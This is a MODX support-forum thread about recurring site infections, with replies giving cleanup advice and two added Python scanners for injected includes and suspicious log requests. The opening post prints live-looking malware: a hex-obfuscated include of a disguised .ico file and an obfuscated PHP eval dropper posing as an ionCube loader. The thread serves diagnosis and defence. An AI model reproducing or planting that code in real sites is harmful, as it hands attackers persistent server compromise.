MODX website keeps getting infected with malicious code injections - My Forums
https://forums.modx.com/thread/?thread=103546
Installation info:

  • MODX version: 2.6.1
  • PHP version: 5.6.33
  • DB info: mysql, version: 10.0.29-MariaDB-cll-lve

My MODX installations keep getting compromised.
Malicious code is injected in certain index.php files. Example:

/*3e166*/

@include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";

/*3e166*/


The includes are referring to ICO files, which contain scrambled code.

Besides this, the hack also creates new, random, files, like:
ucwuwapz.php
footer21.php
vexwzlkn.php

Contents of footer21.php (similar to the other files):
<?php //000310
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>

Another practical problem is that MODX sites that are infected will stop working after a while.

I did all the standard stuff and followed the excellent guide at https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace


  • Checked for malicious plugins/users
  • Changed all passwords, from MODX users to DirectAdmin/FTP/DB
  • Moved the website to a new hosting account
  • Used the guide mentioned earlier to identify malicious includes via SSH

Unfortunately this will only temporarily remove the infection.
Right now the only thing I can do is run a cronjob that removes all unwanted ICO files from my host every hour...

I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.

Is there someone who experienced the same problems and found a solution? Any advice is welcome!

Thanks in advance.
hartmanrik Feb 26, 2018, 11:06 AM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=3#dis-post-557021
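As an added illustration (not from the original post or from the MODX project): a small Python scanner that decodes the PHP \xNN-escaped include paths of the kind quoted above and flags include/require statements that point at non-code files such as the .ico targets described. The sample strings are constructed, and the extension list is an assumption to adjust per site.

```python
import os
import re

# Constructed sample (not from the thread): an index.php prologue of the kind the post shows,
# with the include target written as PHP \xNN escapes.
SAMPLE_INFECTED = '<?php\n/*3e166*/\n\n@include "\\x2fho\\x6de/\\x73it\\x65/f\\x61v.\\x69co";\n\n/*3e166*/\n'
SAMPLE_CLEAN = '<?php\nrequire_once dirname(__FILE__) . "/config.core.php";\n'

# include/require with a double-quoted literal; captures the raw (possibly escaped) path
INCLUDE_RE = re.compile(r'@?(?:include|require)(?:_once)?\s*\(?\s*"((?:\\x[0-9a-fA-F]{2}|[^"])*)"')
HEX_ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Extensions PHP code has no business including; the thread's sample points at .ico (assumed list)
NON_CODE_EXT = ('.ico', '.png', '.jpg', '.gif', '.txt')

def decode_php_escapes(s):
    """Resolve PHP double-quoted \\xNN escapes so the real include target is readable."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)

def find_suspicious_includes(source):
    """Return [(decoded_path, reason)] for include/require statements that look injected."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        raw = m.group(1)
        path = decode_php_escapes(raw)
        reasons = []
        if '\\x' in raw:
            reasons.append('hex-escaped path')
        if path.lower().endswith(NON_CODE_EXT):
            reasons.append('non-PHP include target')
        if reasons:
            findings.append((path, ', '.join(reasons)))
    return findings

def scan_tree(root):
    """Walk a webroot; map each PHP file to its suspicious includes (empty map = nothing found)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding='utf-8', errors='replace') as fh:
                hits = find_suspicious_includes(fh.read())
            if hits:
                report[full] = hits
    return report
```

Run scan_tree('/path/to/public_html') over a local copy of the site; the decoded path tells you which dropped file each injected index.php is loading, so both ends of the infection can be removed together.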
Re: MODX website keeps getting infected with malicious code injections
BobRay Mar 12, 2019, 07:04 PM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=3#dis-post-564392
Re: MODX website keeps getting infected with malicious code injections
I'm honestly not sure what that has to do with the hacks mentioned in this topic.

The only reason I can think of to change that setting is if you're trying to use 2 different CMSs that both use the q parameter, from the same index.php file, which would be... interesting and oddly specific.
markh Mar 12, 2019, 04:40 AM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=3#dis-post-564376
Re: MODX website keeps getting infected with malicious code injections
Quote from: goldsky at Nov 27, 2018, 06:20 AM
You can try to change the "request_param_alias" parameter in System Settings, and edit your htaccess to follow the value.

RewriteRule ^(.*)$ index.php?typeYourNewParamAliasHere=$1 [L,QSA]


Make it random and hard to guess.

What exactly will this do?
rgliberty Mar 08, 2019, 02:32 AM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=3#dis-post-564338
Re: MODX website keeps getting infected with malicious code injections
You can try to change the "request_param_alias" parameter in System Settings, and edit your htaccess to follow the value.

RewriteRule ^(.*)$ index.php?typeYourNewParamAliasHere=$1 [L,QSA]


Make it random and hard to guess.
goldsky Nov 27, 2018, 06:20 AM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-562957
Re: MODX website keeps getting infected with malicious code injections
Quote from: nickyz at Nov 02, 2018, 04:11 PM
I had a similar problem but tried this tool and it worked: https://revisium.com/aibo/
You should scan a full local copy of the website and then clean all the mess manually according to the scan report generated.
These code injections could survive version upgrades. I had the infection even with 2.6.5 system upgraded.

Thanks for the contribution!
I'm still having issues, even after a thorough cleanup. (and also on 2.6.5....)
I will try your solution.
hartmanrik Nov 12, 2018, 02:16 PM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-562662
Re: MODX website keeps getting infected with malicious code injections
I had a similar problem but tried this tool and it worked: https://revisium.com/aibo/
You should scan a full local copy of the website and then clean all the mess manually according to the scan report generated.
These code injections could survive version upgrades. I had the infection even with 2.6.5 system upgraded.
nickyz Nov 02, 2018, 04:11 PM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-562499
Re: MODX website keeps getting infected with malicious code injections
Version 2.5.2 is somewhat old (Nov. 2016) and there have been several security updates since then. Upgrading won't solve your current problem, but once you have things straightened out, you should definitely update to 2.6.0, then the current version.

If you are on a shared server, it's worth asking the hosting service if other sites on your server have been compromised.
BobRay Apr 09, 2018, 08:06 PM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-557868
Re: MODX website keeps getting infected with malicious code injections
Just noticed that someone has been able to log in and modify files in our Revolution environment (2.5.2). A certain template file had been modified to include the JS for the Miner-C Trojan.

Our log file shows calls to manager/index.php with the following GET parameters:

?a=system/file/edit&file=site/units/PageTitle/PageTitle.tpl&wctx=mgr&source=1

We are also seeing POST calls to /connectors/index.php

What did they do and how do I prevent this action?
bjortin Apr 08, 2018, 04:22 PM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-557845
Re: MODX website keeps getting infected with malicious code injections
@JayGilmore

Great additions.
Thanks a lot!

Not sure if I mentioned it before: index.php files are indeed altered. Yesterday I did a thorough search and clean operation. Found numerous malicious files and includes.
Searched the database for suspicious code (found nothing). After that I changed all the passwords.

Unfortunately, overnight several index.php files have been altered.
This particular website is not on a virtual/shared host.

Apache logs are full of strange and unwanted requests, like: "GET /docs/c6n97.php?27a1=wp-content%2Fthemes%2Ftwentysixteen%2Fjs%2Fskip-link-focus-fix.js HTTP/1.1" 301 383" (and this is a modest one, if you know what I mean ;-))
Those requests will be redirected to a 443 page as far as I can see and test.

I think my only option is to rebuild the websites.
The thing is that I'm not certain what the source / nature of the hack is. Is it 'just' a malicious backdoor or is my webspace compromised?
hartmanrik Feb 27, 2018, 09:02 AM https://forums.modx.com/thread/103546/modx-website-keeps-getting-infected-with-malicious-code-injections?page=2#dis-post-557055
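An added example, not from any poster or from the MODX project, for the log questions in bjortin's post (manager file edits and connector POSTs) and hartmanrik's post (requests for odd PHP scripts): a Python triage of Apache access-log lines that flags manager file-editor actions, POSTs to /connectors/index.php and requests for PHP scripts outside the stock entry points, grouped by client. The log lines and IPs are constructed, and the set of known entry points is an assumption to adjust per site.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (not real logs) modelled on the requests quoted
# in the thread: a manager file edit, a connector POST and a probe of a dropped script.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Apr/2018:03:12:01 +0000] "GET /manager/index.php?a=system/file/edit&file=site/units/PageTitle/PageTitle.tpl&wctx=mgr&source=1 HTTP/1.1" 200 5120
203.0.113.7 - - [08/Apr/2018:03:12:05 +0000] "POST /connectors/index.php HTTP/1.1" 200 140
198.51.100.9 - - [08/Apr/2018:03:14:00 +0000] "GET /docs/c6n97.php?27a1=wp-content%2Fthemes%2Ftwentysixteen%2Fjs%2Fskip-link-focus-fix.js HTTP/1.1" 301 383
192.0.2.4 - - [08/Apr/2018:03:15:00 +0000] "GET /index.php?q=about HTTP/1.1" 200 9000
"""

# Combined-log prefix: client, identd, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# PHP entry points a stock MODX Revolution site at the webroot exposes (assumed; adjust per site)
KNOWN_PHP = {'/index.php', '/manager/index.php', '/connectors/index.php'}

def classify(line):
    """Return (ip, category, detail) for a request worth a closer look, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    action = qs.get('a', [''])[0]
    # Manager file-editor actions: legitimate for admins, so check who held the session
    if parts.path == '/manager/index.php' and action.startswith('system/file/'):
        return (ip, 'manager-file-edit', f"{action} {qs.get('file', [''])[0]}")
    # Connector POSTs carry manager processor calls; unusual volume or timing stands out
    if method == 'POST' and parts.path == '/connectors/index.php':
        return (ip, 'connector-post', parts.path)
    # Any PHP script outside the known entry points may be a dropped file
    if parts.path.endswith('.php') and parts.path not in KNOWN_PHP:
        return (ip, 'unknown-php-script', parts.path)
    return None

def triage(log_text):
    """Group flagged requests by client IP, preserving log order."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            by_ip[hit[0]].append((hit[1], hit[2]))
    return dict(by_ip)
```

A manager file edit is normal admin activity, so match the flagged client and time against who was legitimately logged into the manager before treating it as an intrusion; an unknown-php-script hit names a file to inspect on disk.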